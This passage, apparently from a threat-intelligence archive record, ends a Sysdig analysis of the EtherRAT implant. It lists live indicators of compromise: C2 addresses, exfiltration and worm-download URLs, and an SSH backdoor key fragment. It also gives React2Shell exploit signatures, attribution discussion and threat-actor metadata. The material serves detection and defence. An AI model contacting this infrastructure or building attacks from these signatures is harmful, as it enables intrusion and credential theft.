The full public key is\r\nincluded in the IOCs section below.\r\nIndicators of compromise\r\nEthereum infrastructure\r\nType Value\r\nSmart contract 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4\r\nDeployer wallet 0xe941a9b283006f5163ee6b01c1f23aa5951c4c8d\r\nFunding wallet 0x14afddd627fb0e039365554f8bbdb881ecb1c708\r\nC2 Servers\r\nIP Address Port Purpose\r\n91.215.85.42 3000 Primary C2 (recon, credentials)\r\n173.249.8.102 80 Secondary C2\r\n193.24.123.68 3001 Worm payload delivery\r\nURLs\r\nhttp://91.215.85.42:3000/{hwid} # Recon exfiltration\r\nhttp://91.215.85.42:3000/crypto/keys # Credential exfiltration\r\nhttp://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh # Worm shell script\r\nhttps://grabify.link/SEFKGU # IP logger (briefly used)\r\nhttps://webhook.site/63575795-ee27-4b29-a15d-e977e7dc8361 # Web hijacker exfil\r\nWeb hijacker target\r\nxss.pro\r\nSSH backdoor key\r\nFingerprint: SHA256:1RquAvdtW48Ken6IVUZi/o4liu1SXlvezhgjb2fnvBg\r\nComment: root@vps\r\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFTxaWmhQkYYF2LgNsAumFqxUiUSv8YEd7DRE9Wb076YxY0fGn4scWzmQnIP/xsrynapcrGKhB\r\nFilesystem artifacts\r\nPath Description\r\n/tmp/nextjs_scan.log Worm scan results\r\n/etc/nginx/sites-enabled/*.bak Backup of original nginx configs\r\n/etc/nginx/conf.d/*.bak Backup of original nginx configs\r\n/etc/apache2/sites-available/*.disabled Disabled Apache vhosts\r\n/etc/apache2/sites-available/000-redirect.conf Apache hijacker config\r\n~/.ssh/authorized_keys SSH backdoor persistence\r\nNetwork signatures\r\nWorm scanning:\r\nHigh-volume connections to ports 80, 443, 3000, 3001, 8080, 8443\r\nIncludes private IP ranges (10.x, 172.16-31.x, 192.168.x)\r\nReact2Shell 
exploit:\r\nHTTP requests with Next-Action header (40 random alphanumeric characters)\r\nPOST body containing $1:__proto__:then (prototype pollution signature)\r\nRecon exfiltration:\r\nPOST requests to /{hwid} endpoint where hwid matches the pattern of a hardware identifier\r\nCIS country exclusion\r\nThe reconnaissance payload self-terminates if the system locale matches:\r\nru, be, kk, ky, tg, uz, hy, az, ka\r\n(Russia, Belarus, Kazakhstan, Kyrgyzstan, Tajikistan, Uzbekistan, Armenia, Azerbaijan, Georgia)\r\nConclusion\r\nEtherRAT demonstrates how threat actors can combine commodity techniques into an effective multi-stage\r\nimplant. The blockchain C2 provides resilience against takedowns while creating an immutable audit trail that\r\nworks against the attacker. The payload collection covers the full spectrum: reconnaissance for target evaluation,\r\ncredential harvesting for financial theft, worm propagation for expanding access, web server hijacking for traffic\r\nmonetization, and SSH keys for persistent access independent of C2.\r\nHowever, EtherRAT attribution remains complicated. The Sysdig TRT's initial reporting assessed a probability of\r\nDPRK-nexus activity based on AES-256-CBC loader patterns seen in Contagious Interview campaigns, without\r\nbeing able to compare code between the campaigns. The CIS country exclusion, xss.pro redirects, and\r\nwebhook.site exfiltration, more commonly associated with Russian-speaking threat actors, contradict the team’s\r\ninitial North Korean attribution. Taken together, the attribution evidence suggests either a CIS-based operator, shared\r\ntooling, or deliberate false flags. 
\r\nWhat remains clear is that React2Shell exploitation is actively being weaponized, and organizations running\r\nvulnerable Next.js deployments face threats from multiple actors.\r\nSource: https://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2"
	],
	"report_names": [
		"etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434310,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1137e8b9cb61c71a76fa284aff924e4f6936f935.pdf",
		"text": "https://archive.orkl.eu/1137e8b9cb61c71a76fa284aff924e4f6936f935.txt",
		"img": "https://archive.orkl.eu/1137e8b9cb61c71a76fa284aff924e4f6936f935.jpg"
	}
}